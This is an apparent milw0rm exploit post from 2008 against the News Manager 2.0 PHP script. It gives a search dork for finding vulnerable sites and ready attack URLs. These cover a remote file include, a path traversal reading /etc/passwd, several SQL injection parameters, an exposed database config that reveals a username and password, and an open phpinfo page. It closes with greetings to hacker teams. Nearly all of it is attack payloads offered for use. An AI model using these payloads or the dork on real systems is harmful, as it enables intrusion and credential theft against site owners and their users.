22 lines
No EOL
889 B
Text
22 lines
No EOL
889 B
Text
News Manager 2.0 Multiple Vulnerabilities
|
|
Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip
|
|
Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
|
|
1- Remote File Include Vulnerability
|
|
/ch_readalso.php?read_xml_include=http://localhost/020.txt
|
|
2- Remote File Disclosure Vulnerability
|
|
/attachments.php?id=../../../../../../../../../../../../../etc/passwd
|
|
/login/attachments.php?id=
|
|
3- Remote SQL Injection Vulnerabilities
|
|
/list_tagitems.php?pid=-41[SQL]
|
|
/advsearch.php?lang='[SQL]
|
|
/archive.php?lang='[SQL]
|
|
/index.php?lang='[SQL]
|
|
4- Remote Permission Bypass Vulnerability
|
|
/db/connect_str.php
|
|
You Can Get Username Of db & Pass & Name .. As
|
|
mysql||localhost||newsmanager||root||mahmood4li
|
|
5- You Can Get PHPINFO From
|
|
/login/info.php
|
|
Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs :)
|
|
|
|
# milw0rm.com [2008-05-15] |